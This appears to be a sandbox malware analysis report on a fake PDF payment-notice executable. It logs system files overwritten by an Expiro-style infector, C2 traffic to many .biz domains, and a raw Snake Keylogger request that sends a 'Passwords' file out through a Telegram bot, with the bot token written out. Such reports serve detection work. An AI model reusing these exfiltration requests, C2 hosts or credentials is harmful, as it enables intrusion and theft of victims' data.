                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AB841h 17_2_019AB57F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AC212h 17_2_019ABDF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AF4A2h 17_2_019AF1E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AC212h 17_2_019AC13F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AE798h 17_2_019AE4E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AFA30h 17_2_019AF779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AEBF0h 17_2_019AE938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AF048h 17_2_019AED95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 019AC212h 17_2_019ABDE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E969Dh 17_2_068E9360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EE988h 17_2_068EE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E8901h 17_2_068E8658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EAA58h 17_2_068EA7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EB760h 17_2_068EB4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068ED828h 17_2_068ED580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EE530h 17_2_068EE288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E84A9h 17_2_068E8200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EF690h 17_2_068EF3E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EB308h 17_2_068EB060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068ED3D0h 17_2_068ED128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EE0D8h 17_2_068EDE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EF238h 17_2_068EEF90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E91B1h 17_2_068E8F08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EAEB0h 17_2_068EAC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E8051h 17_2_068E7DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EC010h 17_2_068EBD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068E8D59h 17_2_068E8AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EEDE0h 17_2_068EEB38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EFAE8h 17_2_068EF840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EDC80h 17_2_068ED9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4x nop then jmp 068EBBB8h 17_2_068EB910

                  Networking

                  Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:58130 -> 1.1.1.1:53
                  Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 18.141.10.107:80
                  Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63116 -> 1.1.1.1:53
                  Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49792 -> 82.112.184.197:80
                  Source: Network traffic Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49716 -> 149.154.167.220:443
                  Source: unknown DNS query: name: api.telegram.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd19939553a042 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
                  Source: Joe Sandbox View IP Address: 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49706
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49706
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49708
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49708
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49710
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49710
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49946
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49946
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49952
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49952
Source: global traffic | HTTP traffic detected: POST /ihnlsqbtrmkahnv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /taohikdratudiqxk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 892
Source: global traffic | HTTP traffic detected: POST /jji HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /xxitmchctwqm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 892
Source: global traffic | HTTP traffic detected: POST /yfypviummaqwyuq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /gjuvotllw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: POST /iwsxa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: GET /iwsxa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Source: global traffic | HTTP traffic detected: GET /iwsxa?usid=25&utid=8132645662 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: POST /snsobwmcccpnrm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: GET /snsobwmcccpnrm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.przvgke.biz
Source: global traffic | HTTP traffic detected: GET /snsobwmcccpnrm?usid=25&utid=8132647334 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Source: global traffic | HTTP traffic detected: POST /feiwbqpqckjc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /dtxqcr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /kdexhblwxghmj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /cfsmnhjm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /o HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /vtfq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /pn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /eglmpsrvxnyx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: global traffic | HTTP traffic detected: POST /lqpvpf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: przvgke.biz
Source: global traffic | DNS traffic detected: DNS query: ww99.przvgke.biz
Source: global traffic | DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: zlenh.biz
Source: global traffic | DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic | DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic | DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic | DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic | DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic | DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic | DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic | DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic | DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
Source: unknown | HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd19939553a042 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
Source: officesvcmgr.exe.2.dr | String found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/C
Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/J
Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/U
Source: armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.234.222.138/snsobwmcccpnrm
Source: armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/4
Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/b
Source: armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/feiwbqpqckjc
Source: armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/jji
Source: armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/b
Source: armsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://44.221.84.105/gjuvotllw
Source: armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
Source: armsvc.exe, 00000002.00000003.2121150907.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/ihnlsqbtrmkahnv
Source: armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/yfypviummaqwyuq
Source: armsvc.exe, 00000002.00000003.2169195097.0000000000989000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177:80/yfypviummaqwyuq
Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.0000000000984000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/
Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/U
Source: armsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/dtxqcr
Source: armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/kdexhblwxghmj
Source: armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://82.112.184.197/kdexhblwxghmjgif
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2149018044.0000000000998000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pywolwnvd.biz/
